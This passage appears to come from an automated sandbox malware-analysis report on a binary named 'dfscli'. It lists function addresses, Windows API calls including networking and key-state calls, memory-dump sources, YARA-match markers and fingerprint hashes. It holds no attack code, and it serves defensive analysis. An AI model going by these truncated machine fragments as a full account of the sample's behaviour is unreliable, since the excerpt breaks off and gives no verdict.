                                                                  • API ID: LibraryLoad
                                                                  • String ID:
                                                                  • API String ID: 1029625771-0
                                                                  • Opcode ID: c3d711c0ca32f0422ebe1e4e81bf2c4620ba86f4f24b7bd6bbb35e06b957768c
                                                                  • Instruction ID: 32c49b9775d694e3b7a3f54abddbe24539b001b80e5412cb69339c7507e8b41b
                                                                  • Opcode Fuzzy Hash: c3d711c0ca32f0422ebe1e4e81bf2c4620ba86f4f24b7bd6bbb35e06b957768c
                                                                  • Instruction Fuzzy Hash: FE0178B5B21301ABD715FBF4B89472A26EBAFC06947040CA8F006CB348EE38DD018BD0
                                                                  Function 00429CA6 Relevance: 1.5, APIs: 1, Instructions: 39COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00429CAB
                                                                    • Part of subcall function 004299F1: TlsAlloc.KERNEL32(?,00429CD5,76230A60,00000000,?,004295E3,00428940,004295FF,0041F399,00425BC8,76230A60,00000000,?,0040E996,00000000), ref: 00429A13
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: AllocH_prolog
                                                                  • String ID:
                                                                  • API String ID: 3910492588-0
                                                                  • Opcode ID: 391db097ecbc7f2e887088de165df358eb552572bb53b512a5a088e6feeae371
                                                                  • Instruction ID: e3d1adaf2064881ac0a353d79633cd097c0c2aad4d25d7745887e64319261521
                                                                  • Opcode Fuzzy Hash: 391db097ecbc7f2e887088de165df358eb552572bb53b512a5a088e6feeae371
                                                                  • Instruction Fuzzy Hash: F4016D35B20112DBDB29AF66F81166E77A2EBD6325F50453FE582D3390DB788C04CB98
                                                                  Function 022342F0 Relevance: 1.5, APIs: 1, Instructions: 30memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RtlAllocateHeap.NTDLL(00000000,00000008,00000480), ref: 02234344
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2117594434.0000000002231000.00000020.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: true
                                                                  • Associated: 00000002.00000002.2117580571.0000000002230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2117609013.000000000223D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2117634381.0000000002240000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2117634381.0000000002245000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2117634381.0000000002252000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_2230000_dfscli.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocateHeap
                                                                  • String ID:
                                                                  • API String ID: 1279760036-0
                                                                  • Opcode ID: 4ea84e08adada8ab621872a34a5346ba314854720047554f852def73907b6ff2
                                                                  • Instruction ID: 296b42382ff2aefb50094ea54d7991c034f64f022902fbde112176804e9fbc5f
                                                                  • Opcode Fuzzy Hash: 4ea84e08adada8ab621872a34a5346ba314854720047554f852def73907b6ff2
                                                                  • Instruction Fuzzy Hash: B3E065B6B613026BDB15F6F5745866B25EBABC0A8135448A9F401CB348EE748D014BD0
                                                                  Function 00403250 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FindResourceA.KERNEL32(?,?,00000006), ref: 00403267
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: FindResource
                                                                  • String ID:
                                                                  • API String ID: 1635176832-0
                                                                  • Opcode ID: 3fb110486180756d7062ab4bb5e945649043ed0de42859ea3d5401de1059676a
                                                                  • Instruction ID: 81cb0e02c961f06c601f38abdce0fa68ed7433aa8319f068ff8f8c5a31199cb9
                                                                  • Opcode Fuzzy Hash: 3fb110486180756d7062ab4bb5e945649043ed0de42859ea3d5401de1059676a
                                                                  • Instruction Fuzzy Hash: 57D0C2263000202AE5101A0A7C01DBB679CDBC5636B01407FF881EA150D2349C03A1B1
                                                                  Function 021C27B0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2117474523.00000000021C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021C1000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_21c1000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: ExitProcess
                                                                  • String ID:
                                                                  • API String ID: 621844428-0
                                                                  • Opcode ID: dc788451ce77f23f7ff2bc00cbd212957274b8706c445c65905decfb28f47e4a
                                                                  • Instruction ID: 280596a6fe94c5078c6dc4b11a7193f30e0a75c0d5f26a5b63ac34db50331c57
                                                                  • Opcode Fuzzy Hash: dc788451ce77f23f7ff2bc00cbd212957274b8706c445c65905decfb28f47e4a
                                                                  • Instruction Fuzzy Hash: E2D05EB8D80208BFD700EFA4E946B9DBBB4EB04312F208069E90467240E7705A248F52
                                                                  Function 021C1820 Relevance: 1.3, APIs: 1, Instructions: 11COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualFree.KERNELBASE(?,?,?), ref: 021C182F
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2117474523.00000000021C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021C1000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_21c1000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: FreeVirtual
                                                                  • String ID:
                                                                  • API String ID: 1263568516-0
                                                                  • Opcode ID: d0f3e4ff2abcb5624e12bde1add21b0f677e9b16e3495b6585c38dd98876ea35
                                                                  • Instruction ID: 30a1b28d409a6a9ef95a6e661cbcf9d5a69e4ed0df47bdad67b9bdd875e6279c
                                                                  • Opcode Fuzzy Hash: d0f3e4ff2abcb5624e12bde1add21b0f677e9b16e3495b6585c38dd98876ea35
                                                                  • Instruction Fuzzy Hash: E3C04C7A55420CAB8B04DF98E884DEB7BEDBB8C610B14C548BA1D87200C630F9608BA4

                                                                  Non-executed Functions

                                                                  Function 00424A99 Relevance: 15.1, APIs: 10, Instructions: 102stringfileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00424A9E
                                                                  • GetFullPathNameA.KERNEL32(?,00000104,?,?,?,?,?), ref: 00424AC8
                                                                  • lstrcpynA.KERNEL32(?,?,00000104,?,?,?), ref: 00424AD9
                                                                    • Part of subcall function 00424A57: lstrcpynA.KERNEL32(00000000,?,00000104,?,?,?), ref: 00424A7C
                                                                    • Part of subcall function 00424A57: PathStripToRootA.SHLWAPI(00000000,?,?,?), ref: 00424A83
                                                                  • PathIsUNCA.SHLWAPI(?,?,?,?,?,?), ref: 00424B0E
                                                                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000,?,?,?), ref: 00424B32
                                                                  • CharUpperA.USER32(?,?,?,?), ref: 00424B4A
                                                                  • FindFirstFileA.KERNEL32(?,?,?,?,?), ref: 00424B63
                                                                  • FindClose.KERNEL32(00000000,?,?,?), ref: 00424B6F
                                                                  • lstrlenA.KERNEL32(?,?,?,?), ref: 00424B8C
                                                                  • lstrcpyA.KERNEL32(?,?,?,?,?), ref: 00424BAB
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Path$Findlstrcpyn$CharCloseFileFirstFullH_prologInformationNameRootStripUpperVolumelstrcpylstrlen
                                                                  • String ID:
                                                                  • API String ID: 4080879615-0
                                                                  • Opcode ID: 0673f5eb62677d010cc7cd393616d49ad2b116331357cec368046e2544c01408
                                                                  • Instruction ID: 4b06695585c640ab3fe26250615955364903dab726ca119cf8fbbfb20b083b72
                                                                  • Opcode Fuzzy Hash: 0673f5eb62677d010cc7cd393616d49ad2b116331357cec368046e2544c01408
                                                                  • Instruction Fuzzy Hash: F1317531700128EBDB219FA5EC88BEEBBBCEF84355F4045A6F515E6250C7389E858B58
                                                                  Function 00418CFE Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 134COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _TranslateName.LIBCMT ref: 00418D59
                                                                  • _TranslateName.LIBCMT ref: 00418DA2
                                                                  • IsValidCodePage.KERNEL32(00000000,00000082,?,0043C8F0,00415C9D,?,0043F8E8,?), ref: 00418E06
                                                                  • IsValidLocale.KERNEL32(00000001), ref: 00418E1C
                                                                  • _strcat.LIBCMT ref: 00418E5F
                                                                    • Part of subcall function 00418BEC: _strlen.LIBCMT ref: 00418BF2
                                                                    • Part of subcall function 00418BEC: EnumSystemLocalesA.KERNEL32(00418802,00000001,?,0043C8F0,00415C9D,?,0043F8E8,?), ref: 00418C0C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: NameTranslateValid$CodeEnumLocaleLocalesPageSystem_strcat_strlen
                                                                  • String ID: 8:C$Norwegian-Nynorsk
                                                                  • API String ID: 4291917928-2144728078
                                                                  • Opcode ID: 574a487d4df5138f39aaf0a3a251f485e9dbddddad8006a7e9d6517df36a9767
                                                                  • Instruction ID: 2c2c8765f4b236233be1cdb350641c934f88d795d8981d40c2d079dedaed01f1
                                                                  • Opcode Fuzzy Hash: 574a487d4df5138f39aaf0a3a251f485e9dbddddad8006a7e9d6517df36a9767
                                                                  • Instruction Fuzzy Hash: 6A4185B1B41340BBDB30AB61AC81BEB37A5AF65700B15143FE545D62F1DF3988C9862E
                                                                  Function 0041B3F3 Relevance: 9.1, APIs: 6, Instructions: 102COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetLocaleInfoW.KERNEL32(00000000,00000001,00000000,00000000,00433B40,00000018,0041A0FB,?,?,?,00000080,00000000,?,?,00000001), ref: 0041B410
                                                                  • GetLastError.KERNEL32(?,?,00000001), ref: 0041B422
                                                                  • GetLocaleInfoW.KERNEL32(00000001,?,00000000,00000000,00433B40,00000018,0041A0FB,?,?,?,00000080,00000000,?,?,00000001), ref: 0041B46D
                                                                  • GetLocaleInfoW.KERNEL32(00000001,?,?,00000000,?,?,00000001), ref: 0041B4DC
                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,?,?,00000000,00000000,?,00000000,?,?,00000001), ref: 0041B4FE
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: InfoLocale$ByteCharErrorLastMultiWide
                                                                  • String ID:
                                                                  • API String ID: 97497842-0
                                                                  • Opcode ID: ec53c0ac90a504556e3c511ba40ffa224ed2ccbe603bfc9167057ac1e3787858
                                                                  • Instruction ID: bfaabb92e0a3a5bf762b7feaf1de5f82b449aebafdeaeb8c174feb8ae06c27e5
                                                                  • Opcode Fuzzy Hash: ec53c0ac90a504556e3c511ba40ffa224ed2ccbe603bfc9167057ac1e3787858
                                                                  • Instruction Fuzzy Hash: B3318D70901229FBCF218F91DD459EF7F75EF09764B20812AF411A6262C7388A91DBE9
                                                                  Function 0041B2C3 Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetLocaleInfoW.KERNEL32(00000000,00000001,00000000,00000000,00433B30,00000018,0041A1AF,?,?,0043F978,00000004,00000000,?,?,00000001), ref: 0041B2E0
                                                                  • GetLastError.KERNEL32(?,?,00000001), ref: 0041B2F2
                                                                  • GetLocaleInfoW.KERNEL32(00000001,?,?,?,00433B30,00000018,0041A1AF,?,?,0043F978,00000004,00000000,?,?,00000001), ref: 0041B31C
                                                                  • GetLocaleInfoA.KERNEL32(00000001,?,00000000,00000000,00433B30,00000018,0041A1AF,?,?,0043F978,00000004,00000000,?,?,00000001), ref: 0041B34B
                                                                  • GetLocaleInfoA.KERNEL32(00000001,?,?,?,?,?,00000001), ref: 0041B3B2
                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,000000FF,?,?,?,?,?,?,00000001), ref: 0041B3D2
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: InfoLocale$ByteCharErrorLastMultiWide
                                                                  • String ID:
                                                                  • API String ID: 97497842-0
                                                                  • Opcode ID: 4f91be03a2c579940054dd89145ab35aa975abc4abe92bc42905e97746423a69
                                                                  • Instruction ID: ba34957b19bfa83a15de8861c2d6b5f59c3863597e2d4372a0d3dd5a209f6675
                                                                  • Opcode Fuzzy Hash: 4f91be03a2c579940054dd89145ab35aa975abc4abe92bc42905e97746423a69
                                                                  • Instruction Fuzzy Hash: 48317E7090061DEBCF229F55DD459EF7B75FF48354B24412BF821A2260D33889A1DB99
                                                                  Function 00403550 Relevance: 9.1, APIs: 6, Instructions: 67windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • IsIconic.USER32(?), ref: 0040355A
                                                                    • Part of subcall function 004262F7: __EH_prolog.LIBCMT ref: 004262FC
                                                                    • Part of subcall function 004262F7: BeginPaint.USER32(?,?,?,?,0041FE9A), ref: 0042632A
                                                                  • SendMessageA.USER32(?,00000027,?,00000000), ref: 00403581
                                                                  • GetSystemMetrics.USER32(0000000B), ref: 0040358F
                                                                  • GetSystemMetrics.USER32(0000000C), ref: 00403595
                                                                  • GetClientRect.USER32(?,?), ref: 004035A2
                                                                  • DrawIcon.USER32(?,?,?,?), ref: 004035DA
                                                                    • Part of subcall function 00426352: __EH_prolog.LIBCMT ref: 00426357
                                                                    • Part of subcall function 00426352: EndPaint.USER32(?,?,?,?,0041FEC0,?), ref: 00426374
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: H_prologMetricsPaintSystem$BeginClientDrawIconIconicMessageRectSend
                                                                  • String ID:
                                                                  • API String ID: 1530917984-0
                                                                  • Opcode ID: f17d443d2831e9e86dea4b6b252fb4e05b77bb08401c64c5df8ed99b70b6788c
                                                                  • Instruction ID: c95341d9d7590c9a11ddb044179971413f278dffb205523bc6025f8df687dda5
                                                                  • Opcode Fuzzy Hash: f17d443d2831e9e86dea4b6b252fb4e05b77bb08401c64c5df8ed99b70b6788c
                                                                  • Instruction Fuzzy Hash: 841160B13143019FD224EF7DDC99D5B77A9ABC8214F444A2DF586C3290DA34E8068A65
                                                                  Function 00403600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 100timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 004215CD: __EH_prolog.LIBCMT ref: 004215D2
                                                                    • Part of subcall function 00423C70: GetDlgItem.USER32(?,?), ref: 00423C7D
                                                                    • Part of subcall function 00423DD5: EnableWindow.USER32(?,?), ref: 00423DE2
                                                                  • SetTimer.USER32(?,00000001,00000001,00000000), ref: 004036BE
                                                                  • listen.WS2_32(?,00000005), ref: 004036FC
                                                                  • SetTimer.USER32(?,00000001,00000001,00000000), ref: 0040370C
                                                                    • Part of subcall function 0042C0CB: __EH_prolog.LIBCMT ref: 0042C0D0
                                                                    • Part of subcall function 0042C0CB: inet_addr.WS2_32(?), ref: 0042C10F
                                                                    • Part of subcall function 0042C0CB: gethostbyname.WS2_32(?), ref: 0042C120
                                                                    • Part of subcall function 0042C0CB: htons.WS2_32(?), ref: 0042C137
                                                                  • SetTimer.USER32(?,00000001,00000001,00000000), ref: 0040372C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Timer$H_prolog$EnableItemWindowgethostbynamehtonsinet_addrlisten
                                                                  • String ID: Busy now
                                                                  • API String ID: 1258581902-130138695
                                                                  • Opcode ID: fce8c989688a1dac9d09d51dfa971bfc43fe77928b07dafcd80c6029d8334aa1
                                                                  • Instruction ID: 6490c2d23ba4975c4b10ba10ff6ed106fbde2c758548d969700f79071d26b33c
                                                                  • Opcode Fuzzy Hash: fce8c989688a1dac9d09d51dfa971bfc43fe77928b07dafcd80c6029d8334aa1
                                                                  • Instruction Fuzzy Hash: FC31243139072077E9356B72AC97FAE22A65B84B15F40051DB206AF1C1DEADBA41874C
                                                                  Function 00427F61 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43librarystringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • lstrcpyA.KERNEL32(00000800,LOC), ref: 00427F84
                                                                  • LoadLibraryA.KERNEL32(?), ref: 00427FB7
                                                                  • GetLocaleInfoA.KERNEL32(00000800,00000003,00000800,00000004), ref: 00427FC7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: InfoLibraryLoadLocalelstrcpy
                                                                  • String ID: LOC
                                                                  • API String ID: 864663389-519433814
                                                                  • Opcode ID: 9b864cf7d00240f33efc80dbe4055dc1b43c4b1b79d0572f7f5122539e718ff0
                                                                  • Instruction ID: 80581f1108e614f4ea904bb7e7a22fcd021204f87db94054b61d7c27fe4284fc
                                                                  • Opcode Fuzzy Hash: 9b864cf7d00240f33efc80dbe4055dc1b43c4b1b79d0572f7f5122539e718ff0
                                                                  • Instruction Fuzzy Hash: 9601F730B0C118EBDB14DB61ED45ADB376CEB00320F418562FA16E2190E738CA058BA9
                                                                  Function 00422175 Relevance: 6.0, APIs: 4, Instructions: 41keyboardwindowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00423CEB: GetWindowLongA.USER32(?,000000F0), ref: 00423CF6
                                                                  • GetKeyState.USER32(00000010), ref: 00422199
                                                                  • GetKeyState.USER32(00000011), ref: 004221A2
                                                                  • GetKeyState.USER32(00000012), ref: 004221AB
                                                                  • SendMessageA.USER32(?,00000111,0000E146,00000000), ref: 004221C1
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: State$LongMessageSendWindow
                                                                  • String ID:
                                                                  • API String ID: 1063413437-0
                                                                  • Opcode ID: aed42ab7bb75c1cd56564738b3e39d445ed7b92ea90c531288bc4bc1f9d8c3dd
                                                                  • Instruction ID: 81c6e2ddc2ea8cfb9092195715bcc3f3fea8f194ae87aed2471ca2276cf2a0cc
                                                                  • Opcode Fuzzy Hash: aed42ab7bb75c1cd56564738b3e39d445ed7b92ea90c531288bc4bc1f9d8c3dd
                                                                  • Instruction Fuzzy Hash: E2F0E93A34036B35D92436777D01FB610144F41BD8FC1053AB702FA1E2C9D98C125239
                                                                  Function 02238CD0 Relevance: .1, Instructions: 131COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2117594434.0000000002231000.00000020.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: true
                                                                  • Associated: 00000002.00000002.2117580571.0000000002230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2117609013.000000000223D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2117634381.0000000002240000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2117634381.0000000002245000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2117634381.0000000002252000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_2230000_dfscli.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: da4503faa85e2536fbe8d3d6130376e8d800ca541ea1d2d3a56c6e55e03e2750
                                                                  • Instruction ID: 1a67a81331231608b1f16fb79b598800c45d2d23ec3d36087902b8a1e38d23a9
                                                                  • Opcode Fuzzy Hash: da4503faa85e2536fbe8d3d6130376e8d800ca541ea1d2d3a56c6e55e03e2750
                                                                  • Instruction Fuzzy Hash: 3541BBE6B263069BEB66AAF9685473B72D69FC4504B14086AF905CF24CEF64CD4047C3
                                                                  Function 0042A305 Relevance: 42.0, APIs: 12, Strings: 12, Instructions: 44registrywindowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegisterWindowMessageA.USER32(Native), ref: 0042A314
                                                                  • RegisterWindowMessageA.USER32(OwnerLink), ref: 0042A31D
                                                                  • RegisterWindowMessageA.USER32(ObjectLink), ref: 0042A327
                                                                  • RegisterWindowMessageA.USER32(Embedded Object), ref: 0042A331
                                                                  • RegisterWindowMessageA.USER32(Embed Source), ref: 0042A33B
                                                                  • RegisterWindowMessageA.USER32(Link Source), ref: 0042A345
                                                                  • RegisterWindowMessageA.USER32(Object Descriptor), ref: 0042A34F
                                                                  • RegisterWindowMessageA.USER32(Link Source Descriptor), ref: 0042A359
                                                                  • RegisterWindowMessageA.USER32(FileName), ref: 0042A363
                                                                  • RegisterWindowMessageA.USER32(FileNameW), ref: 0042A36D
                                                                  • RegisterWindowMessageA.USER32(Rich Text Format), ref: 0042A377
                                                                  • RegisterWindowMessageA.USER32(RichEdit Text and Objects), ref: 0042A381
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
